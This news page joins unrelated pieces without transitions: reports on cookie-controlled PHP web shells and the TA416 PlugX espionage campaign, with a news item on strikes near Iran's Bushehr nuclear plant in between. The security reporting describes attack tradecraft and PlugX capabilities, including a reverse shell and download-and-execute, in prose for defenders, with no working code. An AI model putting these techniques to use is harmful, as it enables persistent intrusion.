Category: Uncategorized

Ravie LakshmananApr 03, 2026Linux / Server Hardening

Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.

“Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality,” the tech giant said.

The approach offers added stealth as it allows malicious code to stay dormant during normal application execution and activate the web shell logic only when specific cookie values are present. This behavior, Microsoft noted, extends to web requests, scheduled tasks, and trusted background workers.

The malicious activity takes advantage of the fact that cookie values are available at runtime through the $_COOKIE superglobal variable, allowing attacker-supplied inputs to be consumed without additional parsing. What’s more, the technique is unlikely to raise any red flags as cookies blend into normal web traffic and reduce visibility.

The cookie-controlled execution model comes in different implementations –

• A PHP loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload.
• A PHP script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
• A PHP script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload.

In at least one case, threat actors have been found to obtain initial access to a victim’s hosted Linux environment through valid credentials or the exploitation of a known security vulnerability to set up a cron job that invokes a shell routine periodically to execute an obfuscated PHP loader.

This “self-healing” architecture allows the PHP loader to be repeatedly recreated by the scheduled task even if it was removed as part of cleanup and remediation efforts, thereby creating a reliable and persistent remote code execution channel. Once the PHP loader is deployed, it remains inactive during normal traffic and springs into action upon receiving HTTP requests with specific cookie values. 

“By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions,” Microsoft added. “By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs.”

A common aspect that ties together all the aforementioned implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, while leaving a minimal interactive footprint.

To counter the threat, Microsoft recommends enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces; monitoring for unusual login activity; restricting the execution of shell interpreters; auditing cron jobs and scheduled tasks across web servers; checking for suspicious file creation in web directories; and limiting hosting control panels’ shell capabilities.

“The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft,” Microsoft said. “By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls.”

“Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code.”

The director general of the International Atomic Energy Agency on Saturday demanded “maximum military restraint” from the U.S. and Israel as it confirmed reports that strikes had targeted a location close to Iran’s Bushehr Nuclear Power Plant, killing at least one person.

In a statement released via social media, the IAEA relayed a message from Director General Rafael Mariano Grossi, who expressed “deep concern about the reported incident.”

Grossi warned that nuclear power plants or nearby areas “must never be attacked, noting that auxiliary site buildings may contain vital safety equipment” and stressed “the paramount importance of adhering to the seven pillars for ensuring nuclear safety and security during a conflict.”

The IAEA said the attack near the Bushehr plant, Iran’s only operational nuclear power facility, was the fourth such attack since Israel and the U.S. began its invasion of Iran on February 28. The plant lies in a city inhabited by about 250,000 people.

A security staff member was killed by a projectile fragment and a building on the Bushehr site was impacted by shockwaves and fragments. Grossi said that no increase in radiation levels was reported.

The IAEA has been informed by Iran that a projectile struck close to the premises of the Bushehr NPP this morning, the fourth such incident in recent weeks. Iran also informed the IAEA that one of the site’s physical protection staff members was killed by a projectile fragment… pic.twitter.com/Iclv7QueMi

— IAEA – International Atomic Energy Agency ⚛️ (@iaeaorg) April 4, 2026

Iranian Foreign Minister Abbas Araghchi also condemned the Bushehr strike and issued a reminder of the “Western outrage about hostilities near Zaporizhzhia Nuclear Power Plant in Ukraine” when Russia attacked the site.

“Israel-U.S. have bombed our Bushehr plant four times now. Radioactive fallout will end life in [Gulf Cooperation Council] capitals, not Tehran. Attacks on our petrochemicals also convey real objectives,” said Araghchi.

Al Jazeera reported that at least two petrochemical facilities had been hit by the U.S. and Israel in southern Iran’s Khuzestan province, an energy hub in the country. At least five people were injured in those attacks,

Iranian news agency Mehr reported that the state-run Bandar Imam petrochemical complex, which produces liquefied petroleum gas and chemicals as well as other products, sustained damage.

President Donald Trump said late last month that he would delay any attacks on Iran’s energy infrastructure until April 6 and said the delay was “subject to the success of the ongoing meetings and discussions.”

He has threatened to destroy Iran’s power plants and other civilian infrastructure if Iranian leaders don’t end the blockade on the oil export waterway the Strait of Hormuz, which they began in retaliation for the U.S.-Israeli strikes that started more than a month ago and which has fueled skyrocketing global energy prices.

The threat amounted to Trump warning that he could soon commit a war crime, said international law experts.

A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.

The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.

“This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries,” Proofpoint researchers Mark Kelly and Georgi Mladenov said.

“Throughout this period, TA416 regularly altered its infection chain, including abusing Cloudflare Turnstile challenge pages, abusing OAuth redirects, and using C# project files, as well as frequently updating its custom PlugX payload.”

TA416 has also been observed orchestrating multiple campaigns aimed at diplomatic and government entities in the Middle East following the outbreak of the U.S.-Israel-Iran conflict in late February 2026. The effort is likely an attempt to gather regional intelligence pertaining to the conflict, the enterprise security company added.

It’s worth mentioning here that TA416 also shares historical technical overlaps with another cluster known as Mustang Panda (aka CerenaKeeper, Red Ishtar, and UNK_SteadySplit). The two activity groups are collectively tracked under the monikers Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon. 

While TA416’s attacks are characterized by the use of bespoke PlugX variants, the Mustang Panda cluster has repeatedly deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What’s common to both of them is the use of DLL side-loading to launch the malware.

TA416’s renewed focus on European entities is driven a mix of web bug and malware delivery campaigns, with the threat actors using freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor via malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances. The PlugX malware campaigns were previously documented by StrikeReady and Arctic Wolf in October 2025.

“A web bug (or tracking pixel) is a tiny invisible object embedded in an email that triggers an HTTP request to a remote server when opened, revealing the recipient’s IP address, user agent, and time of access, allowing the threat actor to assess whether the email was opened by the intended target,” Proofpoint said.

Attacks carried out by TA416 in December 2025 have been found to leverage third-party Microsoft Entra ID cloud applications to initiate redirects that lead to the download of malicious archives. Phishing emails used as part of this attack wave contain a link to Microsoft’s legitimate OAuth authorization endpoint that, when clicked, redirects the user to the attacker-controlled domain and ultimately deploys PlugX.

The use of this technique has not escaped Microsoft’s notice, which last month warned of phishing campaigns targeting government and public-sector organizations that employ OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers.

Further refinements to the attack chain were observed in February 2026, when TA416 began linking to archives hosted on Google Drive or a compromised SharePoint instance. The downloaded archives, in this case, include a legitimate Microsoft MSBuild executable and a malicious C# project file.

“When the MSBuild executable is run, it searches the current directory for a project file and automatically builds it,” the researchers said. “In the observed TA416 activity, the CSPROJ file acts as a downloader, decoding three Base64-encoded URLs to fetch a DLL side-loading triad from a TA416-controlled domain, saving them to the user’s temp directory, and executing a legitimate executable to load PlugX via the group’s typical DLL side-loading chain.”

The PlugX malware remains a consistent presence throughout TA416’s intrusions, although the legitimate, signed executables abused for DLL side-loading have varied over time. The backdoor is also known to establish an encrypted communication channel with its command-and-control (C2) server, but not before performing anti-analysis checks to sidestep detection.

PlugX accepts five different commands –

• 0x00000002, to capture system information
• 0x00001005, to uninstall the malware
• 0x00001007, to adjust beaconing interval and timeout parameter
• 0x00003004, to download a new payload (EXE, DLL, or DAT) and execute it
• 0x00007002, to open a reverse command shell

“TA416’s shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, is consistent with a renewed intelligence-collection focus against EU and NATO-affiliated diplomacy entities,” Proofpoint said.

“In addition, TA416’s expansion to Middle Eastern government targeting in March 2026 further highlights how the group’s tasking prioritization is likely influenced by geopolitical flashpoints and escalations. Throughout this period, the group has shown a willingness to iterate on infection chains, cycling through using fake Cloudflare Turnstile pages, OAuth redirect abuse, and MSBuild-based delivery, while continuing to update its customized PlugX backdoor.”

The disclosure comes as Darktrace revealed that Chinese‑nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with an intent to establish long-term persistence within critical infrastructure networks.

Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved the exploitation of internet-facing infrastructure (e.g., CVE-2025-31324 and CVE-2025-0994) to obtain initial access.

“In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after,” Darktrace said. “The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent.”